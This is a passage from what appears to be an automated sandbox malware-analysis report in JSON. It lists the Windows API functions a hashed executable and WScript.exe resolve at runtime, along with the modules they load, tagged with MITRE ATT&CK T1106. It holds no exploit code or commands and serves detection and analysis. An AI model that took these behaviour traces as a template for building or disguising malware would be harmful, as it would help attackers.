\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CertFreeCertificateChain (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CertOpenStore (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CertOpenStoreW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CertAddCertificateLinkToStore (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CertAddCertificateLinkToStoreW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter LocalAllocW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CertGetCertificateChain (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CertGetCertificateChainW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetUserProfileDirectoryW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter ConvertStringSidToSidW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter RegisterGPNotification (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContextA (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter BCryptOpenAlgorithmProvider (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter BCryptGetProperty (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter BCryptCreateHash (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter BCryptHashData (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter BCryptFinishHash (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter BCryptDestroyHash (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CryptImportKey (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CryptGetKeyParam (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CryptDestroyKey (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetAsymmetricEncryptionInterface (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter BCryptImportKeyPair (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter BCryptVerifySignature (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter BCryptDestroyKey (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CertDuplicateCertificateChain (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CertDuplicateCertificateChainW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CertVerifyCertificateChainPolicy (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CertVerifyCertificateChainPolicyW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter SetLastError (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter EncryptMessage (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter SslEncryptPacket (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetRngInterface (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter DecryptMessage (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter SslDecryptPacket (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter NtQueryInformationThread (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CreateWaitableTimerExW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter SetWaitableTimerEx (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter select (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CoGetContextToken (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter SslDecrementProviderReferenceCount (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter SslFreeObject (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter shutdown (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter WSASend (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CryptCreateHash (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CryptHashData (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CryptVerifySignatureA (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CryptDestroyHash (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter DeleteFile (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter DeleteFileW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter ShellExecuteEx (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter ShellExecuteExW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter SHGetInstanceExplorer (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetLogicalDrives (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockShared (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockShared (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter InitCommonControlsEx (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter OleInitialize (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter OleSetClipboard (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter RegisterClipboardFormat (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter RegisterClipboardFormatW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter OleFlushClipboard (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GlobalAlloc (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GlobalFree (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GlobalLock (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GlobalUnlock (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GlobalReAlloc (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter RtlMoveMemory (UID: 00000000-00005932)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SxsOleAut32MapConfiguredClsidToReferenceClsid (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter DwmIsCompositionEnabled (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SysAddRefString (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SysReleaseString (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SafeArrayReleaseDescriptor (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SafeArrayReleaseData (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SafeArrayAddRef (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter ResolveDelayLoadedAPI (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SaferIdentifyLevel (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SaferComputeTokenFromLevel (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SaferCloseLevel (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter WinVerifyTrust (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter WintrustCertificateTrust (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SoftpubAuthenticode (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SoftpubInitialize (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SoftpubLoadMessage (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SoftpubLoadSignature (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SoftpubCheckCert (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SoftpubCleanup (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContextA (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter DllCanUnloadNow (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter MsiSIPIsMyTypeOfFile (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter CoInitialize (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter StgOpenStorage (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter EncodePointer (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter DecodePointer (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionAndSpinCount (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter ProcessIdToSessionId (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter ImmCreateContext (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter ImmDestroyContext (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter IsFileSupportedName (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter PutSignedDataMsg (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter GetSignedDataMsg (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter CryptReleaseContext (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter GetLayout (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter GdiRealizationInfo (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter FontIsLinked (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter GetTextFaceAliasW (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter RegEnumValueW (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter GetFontAssocStatus (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter GdiIsMetaPrintDC (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter CoRegisterInitializeSpy (UID: 00000000-00004276)\n \"WScript.exe\" called \"GetProcAddress\" with a parameter CoRevokeInitializeSpy (UID: 00000000-00004276)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71b00000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"KERNEL32\" at base 777f0000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"ADVAPI32.DLL\" at base 773b0000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\MSCOREEI.DLL\" at base 6c710000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"SHLWAPI.DLL\" at base 77670000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-2.DLL\" at base 0\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-0.DLL\" at base 0\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"VERSION.DLL\" at base 74fc0000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\CLR.DLL\" at base 65230000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"USER32.DLL\" at base 76d20000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"API-MS-WIN-CORE-QUIRKS-L1-1-0.DLL\" at base 0\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\MSCOREE.DLL\" at base 0\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"MSCOREE.DLL\" at base 6c7a0000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\COMBASE.DLL\" at base 0\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"PSAPI.DLL\" at base 77db0000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"RPCRT4.DLL\" at base 77dc0000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"KERNEL32.DLL\" at base 777f0000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\MSCORLIB\\36EACCFDE177C2E7B93B8DBDDE4E012A\\MSCORLIB.NI.DLL\" at base 63e20000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\OLE32.DLL\" at base 0\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"OLE32.DLL\" at base 77460000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"CRYPTBASE.DLL\" at base 75a20000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 747b0000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"API-MS-WIN-CORE-XSTATE-L2-1-0.DLL\" at base 6c660000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\CLRJIT.DLL\" at base 6aa40000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM\\2C3C912EA8F058F9D04C4650128FEB3F\\SYSTEM.NI.DLL\" at base 633c0000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.DRAWING\\F7568D7F1B9D356F64779B4C0927CFB3\\SYSTEM.DRAWING.NI.DLL\" at base 6a890000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.WINDOWS.FORMS\\C9A4CBC00F690A9E3CDDFC400F6E85BB\\SYSTEM.WINDOWS.FORMS.NI.DLL\" at base 62550000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM.WINDOWS.FORMS\\V4.0_4.0.0.0__B77A5C561934E089\\UXTHEME.DLL\" at base 0\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"UXTHEME.DLL\" at base 747b0000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.CORE\\31FAE3290FAD30C31C98651462D22724\\SYSTEM.CORE.NI.DLL\" at base 61d30000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.CONFIGURATION\\96F7EDB07B12303F0EC2595C7F3778C7\\SYSTEM.CONFIGURATION.NI.DLL\" at base 68d60000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.XML\\15AF16D373CF0528CB74FC73D365FDBF\\SYSTEM.XML.NI.DLL\" at base 615b0000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\NLSSORTING.DLL\" at base 6c310000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"NTDLL.DLL\" at base 77c20000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"SHELL32.DLL\" at base 760d0000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 77650000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"PROFAPI.DLL\" at base 75b40000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_32\\MSCORLIB\\V4.0_4.0.0.0__B77A5C561934E089\\BCRYPT.DLL\" at base 0\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"BCRYPT.DLL\" at base 75640000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"CRYPTSP.DLL\" at base 75530000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 752c0000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"IMM32.DLL\" at base 77d80000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"COMCTL32.DLL\" at base 71800000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"GDI32.DLL\" at base 779e0000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"GDIPLUS.DLL\" at base 74410000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"%WINDIR%\\WINSXS\\X86_MICROSOFT.WINDOWS.GDIPLUS_6595B64144CCF1DF_1.1.7601.23894_NONE_5C0BE957A009922E\\GDIPLUS.DLL\" at base 74410000\n 